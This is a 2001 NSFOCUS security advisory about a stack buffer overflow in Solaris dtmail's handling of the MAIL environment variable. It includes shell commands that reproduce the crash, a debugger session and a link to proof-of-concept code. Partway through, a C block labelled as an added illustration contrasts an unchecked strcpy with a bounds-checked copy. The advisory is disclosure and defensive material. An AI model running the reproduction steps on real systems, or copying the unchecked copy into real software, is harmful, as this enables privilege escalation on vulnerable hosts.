Date: Tue, 24 Jul 2001 19:29:35 +0800
From: Nsfocus Security Team <[email protected]>
To: "[email protected]" <[email protected]>
Subject: NSFOCUS SA2001-04 : Solaris dtmail Buffer Overflow Vulnerability
NSFOCUS Security Advisory(SA2001-04)
Topic: Solaris dtmail Buffer Overflow Vulnerability
Release Date: 2001-7-24
CVE CAN ID : CAN-2001-0548
BUGTRAQ ID : 3081
Affected system:
================
Sun Solaris 2.6 (SPARC/x86)
Sun Solaris 7 (SPARC/x86)
Not affected system:
====================
Sun Solaris 8
Impact:
==========
The NSFOCUS Security Team has found a buffer overflow vulnerability in the
Solaris dtmail program in its handling of the MAIL environment variable.
Exploitation could allow an attacker to run arbitrary code with the
privileges of the mail group.
Description:
============
dtmail is a mail user agent (MUA) shipped as part of the Solaris CDE. It is
installed setgid mail by default.
The vulnerability exists because dtmail does not perform proper bounds
checking on certain environment variables, which allows an attacker to
trigger a buffer overflow.
If the MAIL environment variable is an over-long string (for instance,
longer than 1500 bytes), a stack buffer overflow occurs. The attacker could
overwrite the saved return address and run arbitrary code with mail group
privileges.
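The following is an added illustration of the bug class the advisory describes, not dtmail's own source: a value read from the environment is copied into a fixed-size stack buffer with no length check, shown next to a version that validates the length and rejects over-long input. The function names, the 1500-byte buffer size and the program structure are assumptions for illustration only.

```c
/* Illustration of the bug class (hypothetical code, not dtmail's source). */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAILBOX_MAX 1500   /* assumed buffer size, taken from the advisory's figure */

/* Vulnerable pattern: strcpy() copies as many bytes as the attacker supplies,
 * so a MAIL value longer than the buffer overwrites the saved frame and
 * return address on the stack (the 0x41414161 fault in the dbx session). */
int open_mailbox_unsafe(const char *mail_env)
{
    char path[MAILBOX_MAX];
    if (mail_env == NULL)
        return -1;
    strcpy(path, mail_env);            /* no bounds check */
    return (int)strlen(path);
}

/* Hardened version: validate the length first and reject over-long input.
 * Silently truncating a mailbox path would make the program open the wrong
 * file, so an error return is preferable to a truncated copy. */
int open_mailbox_safe(const char *mail_env)
{
    char path[MAILBOX_MAX];
    size_t len;
    if (mail_env == NULL)
        return -1;
    len = strnlen(mail_env, MAILBOX_MAX);
    if (len >= MAILBOX_MAX)            /* no room for the terminating NUL */
        return -2;
    memcpy(path, mail_env, len + 1);   /* length already validated */
    return (int)len;
}

/* Builds a constructed 2000-byte "AAAA..." value, like the advisory's perl
 * one-liner, and confirms the hardened function refuses it. */
int overlong_value_rejected(void)
{
    static char big[2001];
    memset(big, 'A', 2000);
    big[2000] = '\0';
    return open_mailbox_safe(big) == -2;
}

int main(void)
{
    int rc = open_mailbox_safe(getenv("MAIL"));
    if (rc < 0)
        fprintf(stderr, "MAIL unset or longer than %d bytes, refusing\n", MAILBOX_MAX - 1);
    else
        printf("MAIL accepted (%d bytes)\n", rc);
    return rc < 0 ? 1 : 0;
}
```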
Exploit:
==========
[test@ /tmp]> uname -a
SunOS sun27 5.7 Generic_106541-08 sun4u sparc SUNW,Ultra-5_10
[test@ /tmp]> showrev -p|grep 107200-12
Patch: 107200-12 Obsoletes: Requires: 108374-01, 107887-08 Incompatibles:
Packages: SUNWdtdst, SUNWdtma
[test@ /tmp]> ls -l /usr/dt/bin/dtmail
-r-xr-sr-x 1 bin mail 1553244 Jun 12 2001 /usr/dt/bin/dtmail*
[test@ /tmp]> cp /usr/dt/bin/dtmail .
[test@ /tmp]> export DISPLAY=127.0.0.1:0.0
[test@ /tmp]> MAIL=`perl -e 'print "A"x2000'`; export MAIL
[test@ /tmp]> ulimit -c 200000
[test@ /tmp]> /usr/dt/bin/ttsession -s -c ./dtmail
[A dtmail dialog box will pop up in your X window; click "Local"]
[test@ /tmp]> ls -l core
-rw------- 1 test users 1991892 Jun 22 11:47 core
[test@ /tmp]> dbx ./dtmail ./core
...
Reading dtmail
core file header read successfully
Reading ld.so.1
Reading libSDtMail.so.2
Reading libnsl.so.1
Reading libsocket.so.1
....
Reading libXext.so.0
Reading libc_psr.so.1
detected a multithreaded program
t@1 (l@1) terminated by signal BUS (invalid address alignment)
dbx: core file read error: address 0x41414161 not in data space
dbx: attempt to read stack failed - bad frame pointer
0x001013e4: solaris_valid+0x002c: ret
(/opt/SUNWspro/bin/../WS5.0/bin/sparcv9/dbx)
Proof-of-concept code for this issue is available at:
http://www.nsfocus.com/proof/sol_sparc_dtmail_MAIL_ex.c
Workaround:
====================
Drop the sgid mail attribute of dtmail:
# chmod g-s /usr/dt/bin/dtmail
Vendor Status:
==============
2001.6.18 We informed Sun of this issue.
2001.6.21 Sun replied that the overflow would occur even if the MAIL
environment variable is only 1 byte long.
2001.6.22 We reported our testing results, but have received no reply
to date.
Solaris 2.6 with the following patches is not affected:
SunOS 5.6 SPARC : 105338-27
SunOS 5.6 x86 : 105339-25
Solaris 7 with the following latest patches is still affected:
SunOS 5.7 SPARC : 107200-12
SunOS 5.7 x86 : 107201-12
Solaris 8 is not affected.
Sun security patches are available at:
http://sunsolve.sun.com/securitypatch
Additional Information:
=========================
The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0548 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE entries.
DISCLAIMS:
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.
Copyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use.
NSFOCUS Security Team <[email protected]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)